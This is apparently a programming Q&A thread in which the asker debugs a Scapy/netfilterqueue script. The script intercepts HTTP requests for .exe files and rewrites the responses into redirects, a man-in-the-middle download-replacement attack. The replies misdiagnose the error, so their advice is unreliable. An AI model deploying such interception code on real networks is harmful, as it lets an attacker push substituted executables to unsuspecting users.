# In my Scapy Script I get an Error, I cannot find a reason for and its solution

Tags: python, scapy

In my Scapy Script I get an Error, I cannot find a reason for and its solution

```
#replace_download
import netfilterqueue
import scapy.all as scapy

ack_list = []


def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload()) # i think there is a mistake here, but I don't know how to solve it
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == 80:
            if b'.exe' in scapy_packet[scapy.Raw].load:
                print(b'[+] exe Request')
                ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport == 80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print(b'[+] Replacing file')
                modified_packet = scapy_packet(scapy_packet, b'HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/winrar-x64-610b3id.exe\n\n')

                packet.set_payload(bytes(modified_packet))

    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
```

**Type Error: 'IP' object is not callable**

Can someone please tell me how to fix this?

Comment: Probably its this scapy_packet.haslayer() - that is the calling line. The stack trace should tell you the line the error is on. You're probably trying to do too much at once. Break it up into smaller bits

Comment: First line of `def process_packet(packet)`: `scapy_packet = scapy.IP(...`. That's where you're calling an uncallable `IP`.

Answer (score 0):

After:

if scapy_packet.haslayer(scapy.Raw):

Try Add:
if 'TCP' in scapy_packet:

Comment: It is better to format your code in the answer to make it easier to read and associate with the question. Also add explanation as to why this change will fix the posters issue.